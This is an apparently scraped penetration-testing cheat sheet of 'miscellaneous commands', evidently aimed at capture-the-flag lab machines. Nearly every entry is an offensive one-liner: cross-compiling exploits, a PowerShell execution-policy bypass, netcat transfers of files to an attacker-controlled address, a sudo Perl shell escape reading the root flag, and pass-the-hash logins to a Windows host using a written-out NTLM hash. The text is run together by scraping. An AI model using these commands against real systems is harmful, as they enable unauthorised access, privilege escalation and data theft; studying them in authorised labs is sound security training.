Skip to content

Miscellaneous Commands

Compiling Exploits

gcc -o exploit exploit.c#Compile C code, add –m32 after ‘gcc’ for compiling 32 bit code on 64 bit Linuxi586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe​Cross compilingCompile Windows exploit in Linuxi686-w64-mingw32-gcc 18176.c -lws2_32 -o 18176.exe​Compile Python script to executablewine ~/.wine/drive_c/Python27/Scripts/pyinstaller.exe --onefile exploit.py

Packet Inspection

tcpdump tcp port 80 -w output.pcap -i eth0​

Powershell bypass

Powershell: powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File file.ps1​

Window Exploit Suggester

 ./windows-exploit-suggester.py -d 2019-07-20-mssb.xls -i system.txt

Finding Auxiliary

 ls /usr/share/nmap/scripts/ | grep smb | grep vuln​

Netcat

From attacker to targetAt targetnc -lvp 6969 > blah.txtAt attacker (method 1)nc x.x.x.x 6969 < blah.txtAt attacker (method 2)cat blah.txt | nc x.x.x.x 6969

Perl Exploit

Perl Exploitperl —e 'exec "/bin/sh";'sudo perl -F: -lane 'print $F[0]' /root/root.txt

Awk

Remove duplicate lines:awk '!seen[$0]++' file

Searchsploit

searchsploit --overflow --exact --mirror 21234​ searchsploit --overflow --exact Gwolle

Firewall Rule Enable

firewall rule enableufw allow from victimip to any port 80,443 proto tcp​

Wordlist Creation

Wordlist creation:cewl -w cewl-forum.txt -e -a http://forum.bart.htb

PASS the HASH

​Pass the hash :pth-winexe -U jenkins/administrator //ip cmd.exepth-winexe -U jenkins/administrator%password //ip cmd.execrackmapexec​ pth-winexe --user=jeeves/administrator%aad3b435b51404e eaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 --system //10.10.10.63 cmd.exe​

Share folder Windows to linux

mount -t fuse.vmhgfs-fuse .host:/ /mnt/hgfs -o allow\_other